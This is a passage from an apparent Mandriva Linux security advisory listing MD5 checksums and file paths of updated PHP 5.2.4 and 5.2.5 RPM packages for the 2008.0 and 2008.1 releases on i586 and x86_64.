6a179db52f5020a714d7c20a5a970b1c 2008.0/i586/php-curl-5.2.4-3.5mdv2008.0.i586.rpm\r\n 43a34e79b95814d7193ff830b0aa7dff 2008.0/i586/php-dba-5.2.4-3.5mdv2008.0.i586.rpm\r\n 639080e8f223734bb0c437d3def33bc9 2008.0/i586/php-dbase-5.2.4-3.5mdv2008.0.i586.rpm\r\n f019479e8eeaff7258276262480a9f86 2008.0/i586/php-devel-5.2.4-3.5mdv2008.0.i586.rpm\r\n b74e45c4bc7f486c35af5ca2440e2d58 2008.0/i586/php-dom-5.2.4-3.5mdv2008.0.i586.rpm\r\n 599c9b02ed80c5f441009e82f3402aae 2008.0/i586/php-exif-5.2.4-3.5mdv2008.0.i586.rpm\r\n 637a3269eb564aff3ffb661e353a5d22 2008.0/i586/php-fcgi-5.2.4-3.5mdv2008.0.i586.rpm\r\n 2dfa53416e0c26124fc628c35fe667a6 2008.0/i586/php-filter-5.2.4-3.5mdv2008.0.i586.rpm\r\n ae04ec182eb2b316a5e60997cd22cb13 2008.0/i586/php-ftp-5.2.4-3.5mdv2008.0.i586.rpm\r\n dd3dddbd177d90366286effb8d4f9ec5 2008.0/i586/php-gd-5.2.4-3.5mdv2008.0.i586.rpm\r\n a5611d7d3fdb55aaf88da43df3ce59c9 2008.0/i586/php-gettext-5.2.4-3.5mdv2008.0.i586.rpm\r\n 8fc8d0a71d2082b9299f1117d865a5d3 2008.0/i586/php-gmp-5.2.4-3.5mdv2008.0.i586.rpm\r\n 0dcbf024ff676650a2c90756719086be 2008.0/i586/php-hash-5.2.4-3.5mdv2008.0.i586.rpm\r\n 923408f205ea7dcc69fe80033aead819 2008.0/i586/php-iconv-5.2.4-3.5mdv2008.0.i586.rpm\r\n 2b19ee8e0703fb6cbca2a057739d361f 2008.0/i586/php-imap-5.2.4-3.5mdv2008.0.i586.rpm\r\n 29604f30dda9d43aaf1fc282dc60045c 2008.0/i586/php-json-5.2.4-3.5mdv2008.0.i586.rpm\r\n 6d6cf52d57990b433d906b12d42fec8b 2008.0/i586/php-ldap-5.2.4-3.5mdv2008.0.i586.rpm\r\n a7783cf72a398d332994a85075712666 2008.0/i586/php-mbstring-5.2.4-3.5mdv2008.0.i586.rpm\r\n 14e2af6102e379dd30340b4805dc850c 2008.0/i586/php-mcrypt-5.2.4-3.5mdv2008.0.i586.rpm\r\n 19be3f1680243918d2130b697d2622c4 2008.0/i586/php-mhash-5.2.4-3.5mdv2008.0.i586.rpm\r\n 3b27d5f0741e3e7de3e624f2c18f2b46 2008.0/i586/php-mime_magic-5.2.4-3.5mdv2008.0.i586.rpm\r\n ebd764876db84efd8a17faa6ae9b5f7a 2008.0/i586/php-ming-5.2.4-3.5mdv2008.0.i586.rpm\r\n 5814f12508453ba950da5ba6cefbaac5 2008.0/i586/php-mssql-5.2.4-3.5mdv2008.0.i586.rpm\r\n 85f18345bec730a7ac1f0919e9a76fe8 2008.0/i586/php-mysql-5.2.4-3.5mdv2008.0.i586.rpm\r\n f7874e3ad3062a9bb932105f39182a52 2008.0/i586/php-mysqli-5.2.4-3.5mdv2008.0.i586.rpm\r\n de98c96be9807bbd89e5012dfa8fc423 2008.0/i586/php-ncurses-5.2.4-3.5mdv2008.0.i586.rpm\r\n e4a2f64f33628db36a88ba12ebebbc94 2008.0/i586/php-odbc-5.2.4-3.5mdv2008.0.i586.rpm\r\n 303977af11689f7030ad42af5bb6ff0e 2008.0/i586/php-openssl-5.2.4-3.5mdv2008.0.i586.rpm\r\n a4d11ceeaa02b0ab84c242d9eeb234ec 2008.0/i586/php-pcntl-5.2.4-3.5mdv2008.0.i586.rpm\r\n 32fe7ec6429be3b3a475c20b6122ce26 2008.0/i586/php-pdo-5.2.4-3.5mdv2008.0.i586.rpm\r\n 251cd4bb2e5be5ae17acc80acaa2d90a 2008.0/i586/php-pdo_dblib-5.2.4-3.5mdv2008.0.i586.rpm\r\n 840104aa97e5ef8d7b564771071d7514 2008.0/i586/php-pdo_mysql-5.2.4-3.5mdv2008.0.i586.rpm\r\n b2634ef32c2b52cad42cdf83b81acab1 2008.0/i586/php-pdo_odbc-5.2.4-3.5mdv2008.0.i586.rpm\r\n 592033cfa7a18232f31e828928478143 2008.0/i586/php-pdo_pgsql-5.2.4-3.5mdv2008.0.i586.rpm\r\n 4243111fc22b1b35c4c91042ed6698cc 2008.0/i586/php-pdo_sqlite-5.2.4-3.5mdv2008.0.i586.rpm\r\n 901399176ebf6a51da7dfa4951a70ba0 2008.0/i586/php-pgsql-5.2.4-3.5mdv2008.0.i586.rpm\r\n 930403f48f7a8e63648489e6a9d7c33f 2008.0/i586/php-posix-5.2.4-3.5mdv2008.0.i586.rpm\r\n 3aa0d728c4e8861e52e7dc3e770601b4 2008.0/i586/php-pspell-5.2.4-3.5mdv2008.0.i586.rpm\r\n bc5b445e017b3b81fff29b60f6009e93 2008.0/i586/php-readline-5.2.4-3.5mdv2008.0.i586.rpm\r\n 8bbb3b629b9bd6961fc02cd971ff66df 2008.0/i586/php-recode-5.2.4-3.5mdv2008.0.i586.rpm\r\n 0c67ca595b579d0d8b7e7ba2676a58ac 2008.0/i586/php-session-5.2.4-3.5mdv2008.0.i586.rpm\r\n 119c1e24b95396f249dec9103eb317e2 2008.0/i586/php-shmop-5.2.4-3.5mdv2008.0.i586.rpm\r\n 90b49651d35aefbce08862426a2cb824 2008.0/i586/php-simplexml-5.2.4-3.5mdv2008.0.i586.rpm\r\n b1286df6ce6443853b91fadf0b51129a 2008.0/i586/php-snmp-5.2.4-3.5mdv2008.0.i586.rpm\r\n 791e4a8528e0a26a11339ba95f058d81 2008.0/i586/php-soap-5.2.4-3.5mdv2008.0.i586.rpm\r\n 1693234336370401246c34eaea324523 2008.0/i586/php-sockets-5.2.4-3.5mdv2008.0.i586.rpm\r\n a468d0bda163640dd38c2ad4bbea2d20 2008.0/i586/php-sqlite-5.2.4-3.5mdv2008.0.i586.rpm\r\n a59e6dd79bb5451cc8c1ef5f87b9c643 2008.0/i586/php-sysvmsg-5.2.4-3.5mdv2008.0.i586.rpm\r\n f23f1893a95ad352aaf00c6df031dbf2 2008.0/i586/php-sysvsem-5.2.4-3.5mdv2008.0.i586.rpm\r\n 55169c0284852ee1b00ecb5eae3d5a11 2008.0/i586/php-sysvshm-5.2.4-3.5mdv2008.0.i586.rpm\r\n cf3fdc27986b556396ce5ccdfce4ff90 2008.0/i586/php-tidy-5.2.4-3.5mdv2008.0.i586.rpm\r\n 0340cb689cba22be6d71b4148af4f29d 2008.0/i586/php-tokenizer-5.2.4-3.5mdv2008.0.i586.rpm\r\n f1be80919c306e185a137b40f5e84cf4 2008.0/i586/php-wddx-5.2.4-3.5mdv2008.0.i586.rpm\r\n 00149fa518c9700953fe09bf8982706c 2008.0/i586/php-xml-5.2.4-3.5mdv2008.0.i586.rpm\r\n 9d1904ca199f201b4b5bd75491641b65 2008.0/i586/php-xmlreader-5.2.4-3.5mdv2008.0.i586.rpm\r\n 538b4325eb54795ebc1c0df8cdc9ae23 2008.0/i586/php-xmlrpc-5.2.4-3.5mdv2008.0.i586.rpm\r\n 5e1c42b5470bd53b6bb8ced1997505c4 2008.0/i586/php-xmlwriter-5.2.4-3.5mdv2008.0.i586.rpm\r\n 320719a2533d4393afbb57a327f449a5 2008.0/i586/php-xsl-5.2.4-3.5mdv2008.0.i586.rpm\r\n ef91a6f4885a396cc37b5bbdf41c4c2d 2008.0/i586/php-zlib-5.2.4-3.5mdv2008.0.i586.rpm \r\n 9e31bb51fea2c19142048d60ed29d5ac 2008.0/SRPMS/php-5.2.4-3.5mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.0/X86_64:\r\n 9ee7693384769ee7231bc97ba8e545ad 2008.0/x86_64/lib64php5_common5-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 1a503b4133ae9f5ec5cefa73d1357fc0 2008.0/x86_64/php-bcmath-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 9d0743722ec083c4bf075dfdbfd81972 2008.0/x86_64/php-bz2-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n e5df76df69e141c59da615dee8fcd67f 2008.0/x86_64/php-calendar-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n c34027c38419441099d4736e6dc57a10 2008.0/x86_64/php-cgi-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n ef4f52115d0d578e6604f425337b9a08 2008.0/x86_64/php-cli-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n fd70de0eabefdd829c9d210ae1c7de9f 2008.0/x86_64/php-ctype-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n cd672978186d2d9a38825a2ad6dfb08b 2008.0/x86_64/php-curl-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 423b000c70c2c97ad7c9155158c6578c 2008.0/x86_64/php-dba-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 0bc239359add4a93f90f02ec967c5775 2008.0/x86_64/php-dbase-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n a83770c05086e4698a738504a857f4ea 2008.0/x86_64/php-devel-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 6197196f01afe3dc3108d2a0cd49abb9 2008.0/x86_64/php-dom-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n de7397904d7a96b82542e594f6c9a424 2008.0/x86_64/php-exif-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n f668b70c1f95da26858383c6a96d356c 2008.0/x86_64/php-fcgi-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 0c18dae1d380805636bfcf63ce7e53c0 2008.0/x86_64/php-filter-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n fab3adf34eb1ba08670d9c0a5a11ba1a 2008.0/x86_64/php-ftp-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 1a1534e640dd00f2916f4c1527fa78a0 2008.0/x86_64/php-gd-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 99fdd9644f53f7e042a16a0584298830 2008.0/x86_64/php-gettext-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n f35eb6e836a14c37a8fcda315885281d 2008.0/x86_64/php-gmp-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n b5b4dbbbd2bad91a57aeb793b782e3aa 2008.0/x86_64/php-hash-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n ab55262a28e0130ed993d2b104eca63a 2008.0/x86_64/php-iconv-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 609377659611b09a912c3f4e4c83be76 2008.0/x86_64/php-imap-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 6d3660ffea2d24be4c68d793134c0c34 2008.0/x86_64/php-json-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 675c9aa058452560f0a9abdf5fd2ba82 2008.0/x86_64/php-ldap-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n dc5b6c53e1e758d6b74c1fe10825dd72 2008.0/x86_64/php-mbstring-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n ff64296fcbda0f7569682bd59673450f 2008.0/x86_64/php-mcrypt-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 99104282fed99bc02a25409fc7d7029b 2008.0/x86_64/php-mhash-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 2df02e622e28c550232af3c6e06e0166 2008.0/x86_64/php-mime_magic-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n e9e866f96e0443fc64dd2ae57c0472ef 2008.0/x86_64/php-ming-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n f597684da35da805d0a220b025a3ae7c 2008.0/x86_64/php-mssql-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 064d13eb46925a16963ba775a226ef12 2008.0/x86_64/php-mysql-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 2493c54d72dc450f91d93c0dbc0a01b3 2008.0/x86_64/php-mysqli-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 20a3a90aa00f1b22869f1fc7d4494389 2008.0/x86_64/php-ncurses-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 8fdaffa64e39a508970fb415f6351f01 2008.0/x86_64/php-odbc-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n faf9ad17354a15f824ffecd5bb2a75b7 2008.0/x86_64/php-openssl-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 26f0c38401eed5590503d8a508035b95 2008.0/x86_64/php-pcntl-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 14678e0afc46cbf3f4023e0f867b6627 2008.0/x86_64/php-pdo-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 1370da5235cfdee0b87c9c9d1c7fb87d 2008.0/x86_64/php-pdo_dblib-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 54b56629d70affc6571710d259adbc87 2008.0/x86_64/php-pdo_mysql-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n d02fb5a48a3223ff24ffd73ebf7f950b 2008.0/x86_64/php-pdo_odbc-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n eb8602cd46cedc5ddc85ad9d1d841139 2008.0/x86_64/php-pdo_pgsql-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 2185bcf9b149d2f52ac9f0d103e64aec 2008.0/x86_64/php-pdo_sqlite-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 6ce02c1ad887d742a875c3d01044dddd 2008.0/x86_64/php-pgsql-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n b2b60dfa46b225b916cdb7b9404c4df6 2008.0/x86_64/php-posix-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 7ad5cbb447442b4153ed448d576318a4 2008.0/x86_64/php-pspell-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 43f1710129923b2ef65fd5cbe4b9da4e 2008.0/x86_64/php-readline-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n ae13ce727c71a8c177038e8619d7bc43 2008.0/x86_64/php-recode-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n e71ff58f0f7d63898d8bb7c1e82221a7 2008.0/x86_64/php-session-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n be073bccced4fff6145b7d605ebe10a4 2008.0/x86_64/php-shmop-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n d2aebb985287f8532927b82afe8b34fc 2008.0/x86_64/php-simplexml-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 1621c40c1ce5d44c4c268fe8611554f3 2008.0/x86_64/php-snmp-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 284a2ca48992069c3d4f94b9af36adf4 2008.0/x86_64/php-soap-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n b15bfb57514e457907132864d1e42207 2008.0/x86_64/php-sockets-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n cc13532ecd7a1945e09402d002a3b026 2008.0/x86_64/php-sqlite-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 3969fc11de6e1ef81d2609aaeeec397d 2008.0/x86_64/php-sysvmsg-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 04ec75ae57fef315eb9263da9e07610a 2008.0/x86_64/php-sysvsem-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n b51fc6f6b20232c427083d8699b308ca 2008.0/x86_64/php-sysvshm-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 53a1677552314b4ae1d6eadeebb9685f 2008.0/x86_64/php-tidy-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 72458375e9f70bc34a8133e92dcfd720 2008.0/x86_64/php-tokenizer-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 19ea2a5d529f4dac7b12e4f37b748c98 2008.0/x86_64/php-wddx-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 8541c5727a7d9133a6d7feb34f36ab43 2008.0/x86_64/php-xml-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n e42639d37bfa2d343403d8bc41313dfa 2008.0/x86_64/php-xmlreader-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 1baf9130053d83acdf533e1482a62518 2008.0/x86_64/php-xmlrpc-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 6cd04d07a856fea874d7507d5169688c 2008.0/x86_64/php-xmlwriter-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 5ba83b408e1196608ce18a00c91d98d5 2008.0/x86_64/php-xsl-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 80f1966de2b65538bdd7eb714ec0473a 2008.0/x86_64/php-zlib-5.2.4-3.5mdv2008.0.x86_64.rpm \r\n 9e31bb51fea2c19142048d60ed29d5ac 2008.0/SRPMS/php-5.2.4-3.5mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.1:\r\n 2699bedf3669cddf596019923c01988b 2008.1/i586/libphp5_common5-5.2.5-14.4mdv2008.1.i586.rpm\r\n 5e9fff154cbd7340effcdd4272cc1036 2008.1/i586/php-bcmath-5.2.5-14.4mdv2008.1.i586.rpm\r\n 433fedbea61d093164e2fc9a0861b04a 2008.1/i586/php-bz2-5.2.5-14.4mdv2008.1.i586.rpm\r\n ca22e5f80da1aa662d50d52ecccfc7bd 2008.1/i586/php-calendar-5.2.5-14.4mdv2008.1.i586.rpm\r\n 11d2bc1eef435ff465e929f70b7881b8 2008.1/i586/php-cgi-5.2.5-14.4mdv2008.1.i586.rpm\r\n a971a160099aed54bc5efd863c7ec726 2008.1/i586/php-cli-5.2.5-14.4mdv2008.1.i586.rpm\r\n 4c2943b731b79c7e1e83751d2cddbc02 2008.1/i586/php-ctype-5.2.5-14.4mdv2008.1.i586.rpm\r\n 9151d363427449be03f8ef369559a319 2008.1/i586/php-curl-5.2.5-14.4mdv2008.1.i586.rpm\r\n fd2e195a1627760e3fd1365a04e52546 2008.1/i586/php-dba-5.2.5-14.4mdv2008.1.i586.rpm\r\n 64be53b60563920c6df5a23a7a0c6285 2008.1/i586/php-dbase-5.2.5-14.4mdv2008.1.i586.rpm\r\n 5cabc96de40a9d96d8149e901a16cc98 2008.1/i586/php-devel-5.2.5-14.4mdv2008.1.i586.rpm\r\n d10c3b4c8f10a61ee25d1f6037e51e62 2008.1/i586/php-dom-5.2.5-14.4mdv2008.1.i586.rpm\r\n 720b79d68eb3e4a79955119737191847 2008.1/i586/php-exif-5.2.5-14.4mdv2008.1.i586.rpm\r\n fea8f8ed02a5f30f37e973f94be6a994 2008.1/i586/php-fcgi-5.2.5-14.4mdv2008.1.i586.rpm\r\n 647c4c99aae392c51f09229d1579c4ea 2008.1/i586/php-filter-5.2.5-14.4mdv2008.1.i586.rpm\r\n b35c322379ea0dedec553e47903caa72 2008.1/i586/php-ftp-5.2.5-14.4mdv2008.1.i586.rpm\r\n e3f8416f8a9dec5d25dab3aa2b104b69 2008.1/i586/php-gd-5.2.5-14.4mdv2008.1.i586.rpm\r\n 5b92d876b74168c820a2a3981a3fc05a 2008.1/i586/php-gettext-5.2.5-14.4mdv2008.1.i586.rpm\r\n 8a02b921e2cb3cf77b89a442813f6d25 2008.1/i586/php-gmp-5.2.5-14.4mdv2008.1.i586.rpm\r\n 450d67797c65124c468e65f832160db4 2008.1/i586/php-hash-5.2.5-14.4mdv2008.1.i586.rpm\r\n 8dfaf66e72cfc48e0b7bb2d34e4a682c 2008.1/i586/php-iconv-5.2.5-14.4mdv2008.1.i586.rpm\r\n da4f66f1ae42e3f654cfd11dfe77632f 2008.1/i586/php-imap-5.2.5-14.4mdv2008.1.i586.rpm\r\n 05f021edcd98562b9322b41ba4581e45 2008.1/i586/php-json-5.2.5-14.4mdv2008.1.i586.rpm\r\n afa1628ecfa6fa946c464acfa29e0144 2008.1/i586/php-ldap-5.2.5-14.4mdv2008.1.i586.rpm\r\n 9c1e6614cf68b3f313f62d6b66089121 2008.1/i586/php-mbstring-5.2.5-14.4mdv2008.1.i586.rpm\r\n 4efd9f36dd4e341911163dc445d2c01c 2008.1/i586/php-mcrypt-5.2.5-14.4mdv2008.1.i586.rpm\r\n d7b8fb005b206eda3f4c7790cfb17ce9 2008.1/i586/php-mhash-5.2.5-14.4mdv2008.1.i586.rpm\r\n c96ea0a20a26455c4a6bd33d39226ed4 2008.1/i586/php-mime_magic-5.2.5-14.4mdv2008.1.i586.rpm\r\n abbd2caf78f7d477ff584112bb73b989 2008.1/i586/php-ming-5.2.5-14.4mdv2008.1.i586.rpm\r\n 0d4809d6156e7738953c53db8a0c3871 2008.1/i586/php-mssql-5.2.5-14.4mdv2008.1.i586.rpm\r\n 4f3c37049e3c86995929044678a17c86 2008.1/i586/php-mysql-5.2.5-14.4mdv2008.1.i586.rpm\r\n 2679275da2c84506a8938b2f08a24bfe 2008.1/i586/php-mysqli-5.2.5-14.4mdv2008.1.i586.rpm\r\n af23c5e284122c9a3e0c55f578919efd 2008.1/i586/php-ncurses-5.2.5-14.4mdv2008.1.i586.rpm\r\n da89454a8b64fbb51aaf6d7ca07f776d 2008.1/i586/php-odbc-5.2.5-14.4mdv2008.1.i586.rpm\r\n c023134ba6200923f64ce4ea6d6c6422 2008.1/i586/php-openssl-5.2.5-14.4mdv2008.1.i586.rpm\r\n f80a84ca4c48d7e935b2cb7d781674af 2008.1/i586/php-pcntl-5.2.5-14.4mdv2008.1.i586.rpm\r\n b0c5ee1b78931f848942783f47636484 2008.1/i586/php-pdo-5.2.5-14.4mdv2008.1.i586.rpm\r\n 7a08c05cae436660b750ca132e17262a 2008.1/i586/php-pdo_dblib-5.2.5-14.4mdv2008.1.i586.rpm\r\n 000c3039a02e9487faa5271d6821115d 2008.1/i586/php-pdo_mysql-5.2.5-14.4mdv2008.1.i586.rpm\r\n 03817f8612e8ac494c788335bb4d532e 2008.1/i586/php-pdo_odbc-5.2.5-14.4mdv2008.1.i586.rpm\r\n 64f50e0da0fb7f3e1e9829e15e2f8946 2008.1/i586/php-pdo_pgsql-5.2.5-14.4mdv2008.1.i586.rpm\r\n 32c0351660f620e178b9bff9003bad5a 2008.1/i586/php-pdo_sqlite-5.2.5-14.4mdv2008.1.i586.rpm\r\n 1e77a34d5f01511063da2194ca36d098 2008.1/i586/php-pgsql-5.2.5-14.4mdv2008.1.i586.rpm\r\n 6650386e8d87d3893564e7363430c22d 2008.1/i586/php-posix-5.2.5-14.4mdv2008.1.i586.rpm\r\n f13b6ab00bb56e19d55f387e3412f362 2008.1/i586/php-pspell-5.2.5-14.4mdv2008.1.i586.rpm\r\n ccb9e27af730b9de9d4d0e9e8d7b3beb 2008.1/i586/php-readline-5.2.5-14.4mdv2008.1.i586.rpm\r\n 798712a3c0a41578d7133cee15abb15b 2008.1/i586/php-recode-5.2.5-14.4mdv2008.1.i586.rpm\r\n 592bf07186391fc0ddfe20ff32116e71 2008.1/i586/php-session-5.2.5-14.4mdv2008.1.i586.rpm\r\n a8127e519df4dcc7ebe7b8848c47409a 2008.1/i586/php-shmop-5.2.5-14.4mdv2008.1.i586.rpm\r\n 3f6be3ee7ce37b16022bd43d7bde2138 2008.1/i586/php-snmp-5.2.5-14.4mdv2008.1.i586.rpm\r\n e80ef54ce720993ede94f9ec1273712c 2008.1/i586/php-soap-5.2.5-14.4mdv2008.1.i586.rpm\r\n db13be028286f5c5176beffece796137 2008.1/i586/php-sockets-5.2.5-14.4mdv2008.1.i586.rpm\r\n 799b8a2dc390950bc45926fddb5c381f 2008.1/i586/php-sqlite-5.2.5-14.4mdv2008.1.i586.rpm\r\n 7ea3bc3a05b2652a25bd3c56d2d48845 2008.1/i586/php-sysvmsg-5.2.5-14.4mdv2008.1.i586.rpm\r\n 06b45292a870fc1d27e746bcbb5ebcef 2008.1/i586/php-sysvsem-5.2.5-14.4mdv2008.1.i586.rpm\r\n 921e0e7d5d22fbcf06989171eda9db5b 2008.1/i586/php-sysvshm-5.2.5-14.4mdv2008.1.i586.rpm\r\n f302373d8e3cc6efbeb5f7345ca4901b 2008.1/i586/php-tidy-5.2.5-14.4mdv2008.1.i586.rpm\r\n 3df0e99f9cca7e700374261a0058b868 2008.1/i586/php-tokenizer-5.2.5-14.4mdv2008.1.i586.rpm\r\n d6c41de2069f7ea20f21dcad7a55db7b 2008.1/i586/php-wddx-5.2.5-14.4mdv2008.1.i586.rpm\r\n d44fa2efdb18bf9f4448744a9c643d5c 2008.1/i586/php-xml-5.2.5-14.4mdv2008.1.i586.rpm\r\n c58ab80fd28701ebeb35f504a40452f3 2008.1/i586/php-xmlreader-5.2.5-14.4mdv2008.1.i586.rpm\r\n 7773725131323cd798c4913b08f6c93c 2008.1/i586/php-xmlrpc-5.2.5-14.4mdv2008.1.i586.rpm\r\n 55d2c3fc71c7ce0617b714909ea3b330 2008.1/i586/php-xmlwriter-5.2.5-14.4mdv2008.1.i586.rpm\r\n 8fd2ce7477c382ae828c774f1ea774b6 2008.1/i586/php-xsl-5.2.5-14.4mdv2008.1.i586.rpm\r\n 761b58a4e7fe100a9b56aa4d6d1be31b 2008.1/i586/php-zlib-5.2.5-14.4mdv2008.1.i586.rpm \r\n c5bb17d306abc830af1e3289d0feb87e 2008.1/SRPMS/php-5.2.5-14.4mdv2008.1.src.rpm\r\n\r\n Mandriva Linux 2008.1/X86_64:\r\n 491820e062701dd823cf171153094b54 2008.1/x86_64/lib64php5_common5-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 35b97f20d78e9e49557f765e3db9ce92 2008.1/x86_64/php-bcmath-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 2e79e6acff96bdf8b73ec954f43ba556 2008.1/x86_64/php-bz2-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 03b58fd4dc9965881831e4391473aae9 2008.1/x86_64/php-calendar-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 77f03d3261c625c3f5cadb6bd4739feb 2008.1/x86_64/php-cgi-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 43bfa30615bbc6153e6f42a5fd0e183c 2008.1/x86_64/php-cli-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 8cf5edbb591de82488fa9a07d7f6e9c7 2008.1/x86_64/php-ctype-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n f63a3ba96fafcc559204ee4c7a52fb2f 2008.1/x86_64/php-curl-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 434ee9781e0903accff13ed076f21934 2008.1/x86_64/php-dba-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 964b9af15e42a53a0f95b08da4aedc0d 2008.1/x86_64/php-dbase-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 04dbfc264c32c6bda62077a764a29edf 2008.1/x86_64/php-devel-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n fd50ecbb4c6a2a4365f3eb1e86eaafca 2008.1/x86_64/php-dom-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n f5f71a2eb1a3e92a2375a1a9ead9f757 2008.1/x86_64/php-exif-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 71a3b2911847c7e1bd11e37e09366690 2008.1/x86_64/php-fcgi-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n ebc91459bea6d287b777d64fbe8087c7 2008.1/x86_64/php-filter-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 092a957f088d21a58c7a1d0d62c47d9a 2008.1/x86_64/php-ftp-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n b3f06fa36ba1f75f282b09986c26c518 2008.1/x86_64/php-gd-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n b6783bf4007f5b8d2d55185aec0804da 2008.1/x86_64/php-gettext-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 4ba37091ca19fc2f3ce528318552d8e7 2008.1/x86_64/php-gmp-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 8c849776c26d3af72175ca740f75c8d0 2008.1/x86_64/php-hash-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 2b81f83d3c9abb155e8fea670be5dde5 2008.1/x86_64/php-iconv-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n f9e2405074eda8979df292baabf33c9d 2008.1/x86_64/php-imap-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 52589a8cb582f147ea84c0a30ed62e9a 2008.1/x86_64/php-json-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n e73f78480c53f4606ce7e71b4ba0ee08 2008.1/x86_64/php-ldap-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 32bee617bd97a0c8bc46bef066698228 2008.1/x86_64/php-mbstring-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n f82ee9e0bd90b6996211b49b0c24dae9 2008.1/x86_64/php-mcrypt-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n a908ff19444d0ebef0118cc004a1ae12 2008.1/x86_64/php-mhash-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n c884d06cffc3b87ce307cfb3ec9f25de 2008.1/x86_64/php-mime_magic-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n ac81fb9db82e8df732920de0acb8a54a 2008.1/x86_64/php-ming-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 674155d47bdc17f7fefe4c6cd536ac88 2008.1/x86_64/php-mssql-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n a9f6d8fb665a426b51cfb0648a59fc99 2008.1/x86_64/php-mysql-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n e79dbc75577e346fb6a9d15126e7d1c8 2008.1/x86_64/php-mysqli-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 64fb3e36e335c0ad81f55996ad2c059a 2008.1/x86_64/php-ncurses-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 43df90bdffabf8d81874337a5227f70a 2008.1/x86_64/php-odbc-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 